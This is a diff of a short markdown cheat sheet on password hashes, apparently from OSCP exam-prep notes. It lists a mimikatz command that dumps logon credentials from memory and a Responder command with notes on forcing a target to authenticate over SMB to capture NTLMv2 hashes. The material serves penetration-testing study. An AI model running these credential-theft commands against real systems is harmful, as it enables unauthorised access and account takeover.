wandt0n/oscp-checklists-wandton/Manuals/8_Hashes_cheatsheet.md

 ```powershell
 .\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
 ```

+##### Forced authentication
-Forced authentication (Does not require high privileges, aquires NTLMv2 Hashes)
+Does not require high privileges, aquires NTLMv2 Hashes.
+You need to connect to your kali with SMB to get the NTLMv2 hashes.
+For example by abusing a web application on the target or with `dir \\$tip\test` executed on it.
 ```bash
 sudo responder -A -I tun0
 ```